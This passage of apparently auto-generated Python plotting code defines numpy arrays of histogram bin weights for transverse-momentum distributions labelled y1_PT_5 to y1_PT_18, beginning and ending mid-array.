numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0]) # Creating weights for histo: y1_PT_5 y1_PT_5_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,1.0521138287,0.0,0.0,0.0,0.0,0.0,1.05462838872,1.0529581672,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0]) # Creating weights for histo: y1_PT_6 y1_PT_6_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.229973216998,0.460530808072,0.230829220503,0.0,0.0,1.61317793421,1.15240274035,0.920477165217,1.15054256484,1.38060373767,1.38153171202,2.07437004409,1.61294776583,2.53322550302,1.61266341758,1.61290626636,1.15165229152,0.92203185848,1.84261315664,0.461330825713,0.921052394039,0.920601279385,1.15223251565,0.230176948675,0.0,0.229694017758,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0]) # Creating weights for histo: y1_PT_7 y1_PT_7_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0830760384254,0.165847358816,0.249180259041,0.526419736448,0.692429706441,0.443009858469,0.581384006977,0.66435071468,0.69239546846,1.13512642202,1.05227743143,0.664569222247,0.858600864234,1.02435385702,1.35711126004,1.38487826301,1.57805703303,1.55083283672,1.77186208883,1.10708243764,1.4401472131,1.27387103318,1.24615134788,0.858782825641,0.830925419018,0.99694846869,0.914132561984,0.498457692399,0.720048601283,0.692114640072,0.442941382506,0.415236315666,0.443027169808,0.470818408646,0.249193992704,0.22144518588,0.0554608751386,0.0553348485911,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0]) # Creating weights for histo: y1_PT_8 y1_PT_8_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0403440227356,0.0604268599935,0.0503930720299,0.0805576172232,0.201731370047,0.23190432566,0.151319280518,0.251963175625,0.161288843462,0.131148716398,0.272229434054,0.252114878715,0.272327373569,0.262162659771,0.231659658917,0.33279780269,0.272065655399,0.362996972596,0.322599774893,0.282302761911,0.473878459665,0.443542696297,0.272235016728,0.403350176402,0.453632226044,0.504217439138,0.51428906792,0.504162158533,0.363021123728,0.514233665952,0.403116007514,0.40325824433,0.362891994058,0.262098459024,0.29222153466,0.282312410228,0.241781167675,0.191524907559,0.151294279849,0.121034974838,0.0907700264722,0.100860405756,0.120967982754,0.0908129887871,0.0302123680751,0.0504337587985,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0]) # Creating weights for histo: y1_PT_9 y1_PT_9_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00565805878494,0.00566815817425,0.0169619455134,0.0254827021693,0.0395888751073,0.0311268526523,0.039601994695,0.0395840658743,0.0622763356315,0.0594327323394,0.0650868898745,0.0764076320028,0.107472891846,0.0735744936017,0.107520253173,0.0990339960309,0.0650961620757,0.0933481360318,0.0792254193322,0.107526370517,0.113163291761,0.12163508273,0.116001701082,0.147124671721,0.101859324238,0.124483418308,0.15558919113,0.130141269334,0.130105450166,0.149947576075,0.130131766289,0.164142969903,0.158502432116,0.141429577995,0.132958479555,0.133006494938,0.164064752538,0.178211476929,0.169757306989,0.144283800073,0.135779652585,0.149962773251,0.14993199416,0.115973384318,0.0792300361959,0.138608289544,0.0849048926699,0.107529525374,0.10464279288,0.0848301764259,0.079236807596,0.079200565216,0.0792082984627,0.073535904316,0.0424278615358,0.0735778408278,0.0594086092266,0.039614998861,0.0481249943771,0.0480753246186,0.0339358025352,0.0367818027491,0.0339657352014,0.0339329516218,0.031120396738,0.0254535774542,0.016975253623,0.0169689439093,0.0226350321897,0.0311249751278,0.00566387988057,0.0112954801892,0.0141608904675,0.0113257014094,0.00282343644685,0.0226373714006,0.00565228001056,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0]) # Creating weights for histo: y1_PT_10 y1_PT_10_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00153160945944,0.0,0.00458244334204,0.0045658937295,0.00152859678726,0.00918261301094,0.0122044059151,0.013709548754,0.00915009505437,0.0137175234745,0.0213161679649,0.0106349584744,0.00914642432006,0.0121850775555,0.00914380861174,0.0137339100483,0.0198227686403,0.00915190265768,0.00610556179168,0.019747404578,0.0137420856136,0.0106918613541,0.00759689714047,0.0152843847429,0.0197562535641,0.0152490124271,0.0197859313388,0.0137529548623,0.0091209501092,0.0121805762688,0.0136781815201,0.0136842659365,0.0106551776398,0.00606435906912,0.00914706584202,0.00608507562081,0.00914955159193,0.00911946858335,0.0106546235445,0.00912457122302,0.00607256180755,0.00456727010718,0.0106189145182,0.00763302675935,0.00305141278823,0.00455130885179,0.00611483491481,0.00610244869709,0.00304593326917,0.00152104502231,0.0136897832616,0.0122018421901,0.0122179688471,0.00762967146954,0.0152388756712,0.012167875788,0.0273782669391,0.0167605468568,0.0198326218505,0.0121649694455,0.00761867580678,0.0152004552401,0.00917681922882,0.0151910391627,0.00609524427552,0.0137274711999,0.0106473695024,0.00760823187653,0.0106939324186,0.0091286211996,0.0106218043207,0.00911450417216,0.00454035690231,0.00608897082873,0.00613406048913,0.00305897873046,0.00306009400989,0.00152391119593,0.00760878715336,0.0045914163794,0.0,0.00610525107294,0.0,0.00303492697345,0.00764813737788,0.00152437432043,0.0,0.0,0.00455267577796,0.00152036569427,0.0,0.0,0.0,0.00152202207325,0.00458045970416,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0]) # Creating weights for histo: y1_PT_11 y1_PT_11_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000360770723555,0.000722646559896,0.000721875183778,0.000541571889025,0.00108312182676,0.000901843817599,0.00108299551055,0.00180425952413,0.000902478864638,0.00126467403452,0.000723563122633,0.00162515507803,0.00234822757003,0.00234621883421,0.00180718212691,0.00108281681933,0.00162423581952,0.00252887322792,0.00252739440401,0.00198544202591,0.00397351897714,0.00379219436962,0.00162462170014,0.00126370740743,0.00180512833318,0.00162462092992,0.00270821220625,0.00162549397518,0.00126294373352,0.0025275461375,0.00307150763652,0.00162608935585,0.000542240440668,0.00234960164391,0.00180746518305,0.00198440184274,0.00198667746006,0.00252869992824,0.00234542011526,0.00180547185165,0.000180814220712,0.000541953918536,0.00126246273064,0.00180458994885,0.000541966627179,0.00072244437694,0.000902466155995,0.000360475613461,0.000902352163318,0.00126488314946,0.00180722679971,0.000540151216783,0.000722341552465,0.000902330597136,0.000902885156103,0.000361027784743,0.00108339448492,0.000902741509926,0.000903111986125,0.000902799276485,0.000180057632833,0.000721313307714,0.000542386782618,0.00126429855188,0.0,0.000360961930866,0.00108348691141,0.000541583442337,0.000721823578985,0.00108354121198,0.000722184427424,0.000903285285802,0.00180413551859,0.000903120073443,0.000902358325085,0.00162493941621,0.000902201585154,0.0016241460888,0.00180617198235,0.00144490723918,0.000722291873224,0.00108360359986,0.00162598345049,0.000902796580713,0.0010830417238,0.000541162516677,0.00126447878355,0.000541314250172,0.000722412412777,0.000361264858701,0.00126233102288,0.000541286522223,0.000361461496068,0.000722265685717,0.000360742918585,0.000542143392849,0.000361088170053,0.000541451349472,0.000542489992204,0.00144536590566,0.000180793501773,0.000542069066543,0.000180366953501,0.000541593455207,0.000181029497422,0.0,0.000360738104705,0.000722182886982,0.000722909590295,0.000542037872601,0.000541291528659,0.00018059293628,0.0,0.000360463405461,0.0,0.0,0.000361843718134,0.000542386782618]) # Creating weights for histo: y1_PT_12 y1_PT_12_weights = numpy.array([0.0,0.0,0.0,0.0242945760233,0.0121313846429,0.0121753353338,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0]) # Creating weights for histo: y1_PT_13 y1_PT_13_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.010029957153,0.03010776731,0.100374402715,0.140581268548,0.170818356211,0.200754011796,0.120572665874,0.140442803998,0.100357791927,0.0703121828455,0.0501908168896,0.0200707939587,0.0100369733513,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0]) # Creating weights for histo: y1_PT_14 y1_PT_14_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0440276096061,0.0714206545306,0.192491248692,0.253039749453,0.247494488292,0.330030772449,0.401648425884,0.401435095043,0.473015940681,0.462023978751,0.48414400208,0.451055986579,0.429078156725,0.318922658763,0.269476624576,0.258499978915,0.247451952129,0.280548052346,0.242025889727,0.19804715405,0.192533825481,0.13204086143,0.104476737441,0.0880095547931,0.0385034458943,0.0549958455389,0.0110089276429,0.00549249925614,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0]) # Creating weights for histo: y1_PT_15 y1_PT_15_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0147928195996,0.055277388981,0.104600308931,0.14506227158,0.160884779743,0.186510032062,0.212205349218,0.224992182058,0.263478500671,0.288098074058,0.305923763182,0.318761381004,0.308906248552,0.339479769893,0.344402706549,0.3266523732,0.362174363979,0.279305698529,0.303940583569,0.282253872972,0.265457872413,0.231895332195,0.199337228341,0.19340660861,0.174670958423,0.133246085253,0.122358458437,0.119387076019,0.102607709846,0.0848683992833,0.0750164333773,0.0365294974881,0.0365292409578,0.0365142419519,0.0217103715081,0.0128268034666,0.00493401956619,0.000986136934466,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0]) # Creating weights for histo: y1_PT_16 y1_PT_16_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00655364752036,0.0181514449771,0.0297468217899,0.0360501787234,0.0509137449993,0.0499039163463,0.0577255171907,0.066038648801,0.0738568087299,0.0819275558566,0.0955366163861,0.0899952621744,0.0920037164999,0.0907503830654,0.101323555933,0.0932744145541,0.102847001228,0.110151344462,0.111929977646,0.109906239254,0.115712263878,0.11367944307,0.113932670439,0.114955542562,0.10966073394,0.112920121062,0.106624246119,0.09982691777,0.0894781646067,0.0884859406373,0.0768790127515,0.0640205118995,0.0557069001615,0.0519272946422,0.0431037872525,0.0408405451437,0.0330231334138,0.0289966422135,0.0279884499959,0.0184012674394,0.0161336641704,0.0118504366684,0.0115988977495,0.00756123557724,0.00479147871621,0.00378240986538,0.00100786533064,0.000758340947634,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0]) # Creating weights for histo: y1_PT_17 y1_PT_17_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00171665066365,0.00716273325226,0.00830507681594,0.00945558160472,0.0111664415277,0.0154553187848,0.0163181011473,0.0188913615159,0.0183228251609,0.0234725751958,0.0254910962088,0.0254800686071,0.0312134117224,0.0274758545645,0.0309038290503,0.0303437708515,0.0306315982549,0.0369403562293,0.0352326276253,0.0372333924999,0.0415200002506,0.0403831874841,0.0461044232325,0.0392320278377,0.0398048832534,0.039493021077,0.0472134820349,0.0412299833233,0.0392242795228,0.0389307333631,0.0366414212416,0.0429633163589,0.0389654758073,0.0432280287894,0.0415058833207,0.0357891066025,0.0375015941716,0.0320558385119,0.0251971301404,0.0354899916539,0.0277622922702,0.0300570732024,0.0297856622287,0.0232101022783,0.0214704106256,0.0208983150446,0.0165961606751,0.0183217154023,0.0143321030612,0.0137460205222,0.0120329630771,0.0163090831086,0.0111631222496,0.0105836382755,0.00914648882607,0.00858850317652,0.00858030096033,0.00715637263557,0.00915398119663,0.0048749268033,0.00544004190234,0.00401457191286,0.00515435903251,0.00516097059463,0.00257645067476,0.00543843625154,0.00286371420083,0.00200489497642,0.00314284349593,0.00171761845318,0.00114259850823,0.00142809641829,0.000860972956021,0.000287297018784,0.00114363028384,0.000574942861707,0.000286470898449,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0]) # Creating weights for histo: y1_PT_18 y1_PT_18_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000280735777845,0.00053999532933,0.00103501986161,0.00105864754127,0.00179284197834,0.00218198201648,0.00252738762862,0.00216105507415,0.0026785073775,0.00282948798224,0.003067456302,0.0032595372337,0.00356419205566,0.00388644148559,0.00356177337857,0.00412528071351,0.00369005840171,0.00392831381102,0.00436381147733,0.0043617033599,0.00462228008663,0.0041470739538,0.00479533850655,0.00431961225965,0.00425333438857,0.00446963645803,0.00397433489481,0.00468792929446,0.00364724140496,0.00438564285652,0.00418749239068,0.00421062719834,0.00444959048248,0.00345656532608,0.00440292690485,0.00377839271342,0.00358037007577,0.0034970709376,0.00321713012539,0.003323728781,0.00317454238118,0.00289466024421,0.00349917779771,0.00336791207255,0.00300061975884,0.00284931434476,0.00295568374783,0.00306595170128,0.00315195031946,0.00313036369983,0.00321741847227,0.00343134461375,0.00321634220078,0.00306740097963,0.00315342390612,0.0033254601196,0.00306744456695,0.00362754496618,0.00287136366054,0.00276303618099,0.00241924078498,0.00252407289685,0.002721635353,0.00194406273244,0.00237588523339,0.00174825215123,0.00161970099398,0.00192257921359,0.00151192589988,0.00159871286177,0.00164144729408,0.0014257470649,0.00151201600828,0.00125266307934,0.000927343258086,0.00101509207475,0.00103537191304,0.000734455122773,0.000691302000742,0.000561617992317,0.000756170827921,0.000453726805065,0.000799405676173,0.00047389390307,0.000691456651902,0.000451930923709,0.000324319115094,0.00028085317023,0.000345496181568,0.00017266227825,0.000345540020352,0.000194444202594,0.000172806116402,0.000108108914291,0.000107964573209,8.63712059296e-05,6.47075960096e-05,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0